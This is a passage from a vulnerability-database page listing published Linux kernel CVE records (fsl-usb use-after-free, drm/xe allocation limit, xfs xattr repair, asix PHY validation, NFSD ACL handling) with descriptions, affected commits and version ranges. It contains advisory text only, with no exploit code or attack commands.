| og-> //USE
Fix this by calling disable_delayed_work_sync() in fsl_otg_remove()
before deallocating the fsl_otg structure. This ensures the delayed work
is properly canceled and completes execution prior to memory deallocation.
This bug was identified through static analysis.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
0807c500a1a6d7fa20cbd7bbe7fea14a66112463 , < 4476c73bbbb09b13a962176fca934b32d3954a2e
(git)
Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463 , < 319f7a85b3c4e34ac2fe083eb146fe129a556317 (git) Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463 , < 69f9a0701abc3d1f8225074c56c27e6c16a37222 (git) Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463 , < 2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23 (git) Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463 , < 41ca62e3e21e48c2903b3b45e232cf4f2ff7434f (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/phy/phy-fsl-usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4476c73bbbb09b13a962176fca934b32d3954a2e",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "319f7a85b3c4e34ac2fe083eb146fe129a556317",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "69f9a0701abc3d1f8225074c56c27e6c16a37222",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
},
{
"lessThan": "41ca62e3e21e48c2903b3b45e232cf4f2ff7434f",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/phy/phy-fsl-usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.0"
},
{
"lessThan": "3.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: fsl-usb: Fix use-after-free in delayed work during device removal\n\nThe delayed work item otg_event is initialized in fsl_otg_conf() and\nscheduled under two conditions:\n1. When a host controller binds to the OTG controller.\n2. When the USB ID pin state changes (cable insertion/removal).\n\nA race condition occurs when the device is removed via fsl_otg_remove():\nthe fsl_otg instance may be freed while the delayed work is still pending\nor executing. This leads to use-after-free when the work function\nfsl_otg_event() accesses the already freed memory.\n\nThe problematic scenario:\n\n(detach thread) | (delayed work)\nfsl_otg_remove() |\n kfree(fsl_otg_dev) //FREE| fsl_otg_event()\n | og = container_of(...) //USE\n | og-\u003e //USE\n\nFix this by calling disable_delayed_work_sync() in fsl_otg_remove()\nbefore deallocating the fsl_otg structure. This ensures the delayed work\nis properly canceled and completes execution prior to memory deallocation.\n\nThis bug was identified through static analysis."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:56.261Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4476c73bbbb09b13a962176fca934b32d3954a2e"
},
{
"url": "https://git.kernel.org/stable/c/319f7a85b3c4e34ac2fe083eb146fe129a556317"
},
{
"url": "https://git.kernel.org/stable/c/69f9a0701abc3d1f8225074c56c27e6c16a37222"
},
{
"url": "https://git.kernel.org/stable/c/2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23"
},
{
"url": "https://git.kernel.org/stable/c/41ca62e3e21e48c2903b3b45e232cf4f2ff7434f"
}
],
"title": "usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68781",
"datePublished": "2026-01-13T15:28:56.261Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-13T15:28:56.261Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71076 (GCVE-0-2025-71076)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
VLAI?
EPSS
Title
drm/xe/oa: Limit num_syncs to prevent oversized allocations
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/xe/oa: Limit num_syncs to prevent oversized allocations
The OA open parameters did not validate num_syncs, allowing
userspace to pass arbitrarily large values, potentially
leading to excessive allocations.
Add check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,
returning -EINVAL when the limit is violated.
v2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)
(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
803d418b73387fda392ddd83eace757ac25cf15d , < b963636331fb4f3f598d80492e2fa834757198eb
(git)
Affected: c8507a25cebd179db935dd266a33c51bef1b1e80 , < 338849090ee610ff6d11e5e90857d2c27a4121ab (git) Affected: c8507a25cebd179db935dd266a33c51bef1b1e80 , < f8dd66bfb4e184c71bd26418a00546ebe7f5c17a (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b963636331fb4f3f598d80492e2fa834757198eb",
"status": "affected",
"version": "803d418b73387fda392ddd83eace757ac25cf15d",
"versionType": "git"
},
{
"lessThan": "338849090ee610ff6d11e5e90857d2c27a4121ab",
"status": "affected",
"version": "c8507a25cebd179db935dd266a33c51bef1b1e80",
"versionType": "git"
},
{
"lessThan": "f8dd66bfb4e184c71bd26418a00546ebe7f5c17a",
"status": "affected",
"version": "c8507a25cebd179db935dd266a33c51bef1b1e80",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.13"
},
{
"lessThan": "6.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.12.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:28.759Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb"
},
{
"url": "https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab"
},
{
"url": "https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a"
}
],
"title": "drm/xe/oa: Limit num_syncs to prevent oversized allocations",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71076",
"datePublished": "2026-01-13T15:31:28.759Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-13T15:31:28.759Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68784 (GCVE-0-2025-68784)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
xfs: fix a UAF problem in xattr repair
Summary
In the Linux kernel, the following vulnerability has been resolved:
xfs: fix a UAF problem in xattr repair
The xchk_setup_xattr_buf function can allocate a new value buffer, which
means that any reference to ab->value before the call could become a
dangling pointer. Fix this by moving an assignment to after the buffer
setup.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
e47dcf113ae348678143cc935a1183059c02c9ad , < 1e2d3aa19c7962b9474b22893160cb460494c45f
(git)
Affected: e47dcf113ae348678143cc935a1183059c02c9ad , < d29ed9ff972afe17c215cab171761d7a15d7063f (git) Affected: e47dcf113ae348678143cc935a1183059c02c9ad , < 5990fd756943836978ad184aac980e2b36ab7e01 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/xfs/scrub/attr_repair.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1e2d3aa19c7962b9474b22893160cb460494c45f",
"status": "affected",
"version": "e47dcf113ae348678143cc935a1183059c02c9ad",
"versionType": "git"
},
{
"lessThan": "d29ed9ff972afe17c215cab171761d7a15d7063f",
"status": "affected",
"version": "e47dcf113ae348678143cc935a1183059c02c9ad",
"versionType": "git"
},
{
"lessThan": "5990fd756943836978ad184aac980e2b36ab7e01",
"status": "affected",
"version": "e47dcf113ae348678143cc935a1183059c02c9ad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/xfs/scrub/attr_repair.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.10"
},
{
"lessThan": "6.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix a UAF problem in xattr repair\n\nThe xchk_setup_xattr_buf function can allocate a new value buffer, which\nmeans that any reference to ab-\u003evalue before the call could become a\ndangling pointer. Fix this by moving an assignment to after the buffer\nsetup."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:58.255Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1e2d3aa19c7962b9474b22893160cb460494c45f"
},
{
"url": "https://git.kernel.org/stable/c/d29ed9ff972afe17c215cab171761d7a15d7063f"
},
{
"url": "https://git.kernel.org/stable/c/5990fd756943836978ad184aac980e2b36ab7e01"
}
],
"title": "xfs: fix a UAF problem in xattr repair",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68784",
"datePublished": "2026-01-13T15:28:58.255Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-13T15:28:58.255Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71094 (GCVE-0-2025-71094)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net: usb: asix: validate PHY address before use
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: usb: asix: validate PHY address before use
The ASIX driver reads the PHY address from the USB device via
asix_read_phy_addr(). A malicious or faulty device can return an
invalid address (>= PHY_MAX_ADDR), which causes a warning in
mdiobus_get_phy():
addr 207 out of range
WARNING: drivers/net/phy/mdio_bus.c:76
Validate the PHY address in asix_read_phy_addr() and remove the
now-redundant check in ax88172a.c.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
7e88b11a862afe59ee0c365123ea5fb96a26cb3b , < fc96018f09f8d30586ca6582c5045a84eafef146
(git)
Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b , < f5f4f30f3811d37e1aa48667c36add74e5a8d99f (git) Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b , < 38722e69ee64dbb020028c93898d25d6f4c0e0b2 (git) Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b , < 98a12c2547a44a5f03f35c108d2022cc652cbc4d (git) Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b , < bf8a0f3b787ca7c5889bfca12c60c483041fbee3 (git) Affected: 7e88b11a862afe59ee0c365123ea5fb96a26cb3b , < a1e077a3f76eea0dc671ed6792e7d543946227e8 (git) Affected: 4e4f3cb41d687bd64cd03358862b23c84d82329e (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/asix_common.c",
"drivers/net/usb/ax88172a.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fc96018f09f8d30586ca6582c5045a84eafef146",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "f5f4f30f3811d37e1aa48667c36add74e5a8d99f",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "38722e69ee64dbb020028c93898d25d6f4c0e0b2",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "98a12c2547a44a5f03f35c108d2022cc652cbc4d",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "bf8a0f3b787ca7c5889bfca12c60c483041fbee3",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"lessThan": "a1e077a3f76eea0dc671ed6792e7d543946227e8",
"status": "affected",
"version": "7e88b11a862afe59ee0c365123ea5fb96a26cb3b",
"versionType": "git"
},
{
"status": "affected",
"version": "4e4f3cb41d687bd64cd03358862b23c84d82329e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/asix_common.c",
"drivers/net/usb/ax88172a.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:55.502Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fc96018f09f8d30586ca6582c5045a84eafef146"
},
{
"url": "https://git.kernel.org/stable/c/f5f4f30f3811d37e1aa48667c36add74e5a8d99f"
},
{
"url": "https://git.kernel.org/stable/c/38722e69ee64dbb020028c93898d25d6f4c0e0b2"
},
{
"url": "https://git.kernel.org/stable/c/98a12c2547a44a5f03f35c108d2022cc652cbc4d"
},
{
"url": "https://git.kernel.org/stable/c/bf8a0f3b787ca7c5889bfca12c60c483041fbee3"
},
{
"url": "https://git.kernel.org/stable/c/a1e077a3f76eea0dc671ed6792e7d543946227e8"
}
],
"title": "net: usb: asix: validate PHY address before use",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71094",
"datePublished": "2026-01-13T15:34:54.669Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:55.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68803 (GCVE-0-2025-68803)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
NFSD: NFSv4 file creation neglects setting ACL
Summary
In the Linux kernel, the following vulnerability has been resolved:
NFSD: NFSv4 file creation neglects setting ACL
An NFSv4 client that sets an ACL with a named principal during file
creation retrieves the ACL afterwards, and finds that it is only a
default ACL (based on the mode bits) and not the ACL that was
requested during file creation. This violates RFC 8881 section
6.4.1.3: "the ACL attribute is set as given".
The issue occurs in nfsd_create_setattr(), which calls
nfsd_attrs_valid() to determine whether to call nfsd_setattr().
However, nfsd_attrs_valid() checks only for iattr changes and
security labels, but not POSIX ACLs. When only an ACL is present,
the function returns false, nfsd_setattr() is skipped, and the
POSIX ACL is never applied to the inode.
Subsequently, when the client retrieves the ACL, the server finds
no POSIX ACL on the inode and returns one generated from the file's
mode bits rather than returning the originally-specified ACL.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
c5409ce523af40d5c3019717bc5b4f72038d48be , < c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d
(git)
Affected: d52acd23a327cada5fb597591267cfc09f08bb1d , < 75f91534f9acdfef77f8fa094313b7806f801725 (git) Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 60dbdef2ebc2317266a385e4debdb1bb0e57afe1 (git) Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 381261f24f4e4b41521c0e5ef5cc0b9a786a9862 (git) Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < bf4e671c651534a307ab2fabba4926116beef8c3 (git) Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 214b396480061cbc8b16f2c518b2add7fbfa5192 (git) Affected: c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b , < 913f7cf77bf14c13cfea70e89bcb6d0b22239562 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfsd/vfs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d",
"status": "affected",
"version": "c5409ce523af40d5c3019717bc5b4f72038d48be",
"versionType": "git"
},
{
"lessThan": "75f91534f9acdfef77f8fa094313b7806f801725",
"status": "affected",
"version": "d52acd23a327cada5fb597591267cfc09f08bb1d",
"versionType": "git"
},
{
"lessThan": "60dbdef2ebc2317266a385e4debdb1bb0e57afe1",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "381261f24f4e4b41521c0e5ef5cc0b9a786a9862",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "bf4e671c651534a307ab2fabba4926116beef8c3",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "214b396480061cbc8b16f2c518b2add7fbfa5192",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
},
{
"lessThan": "913f7cf77bf14c13cfea70e89bcb6d0b22239562",
"status": "affected",
"version": "c0cbe70742f4a70893cd6e5f6b10b6e89b6db95b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfsd/vfs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.121",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.220",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.121",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
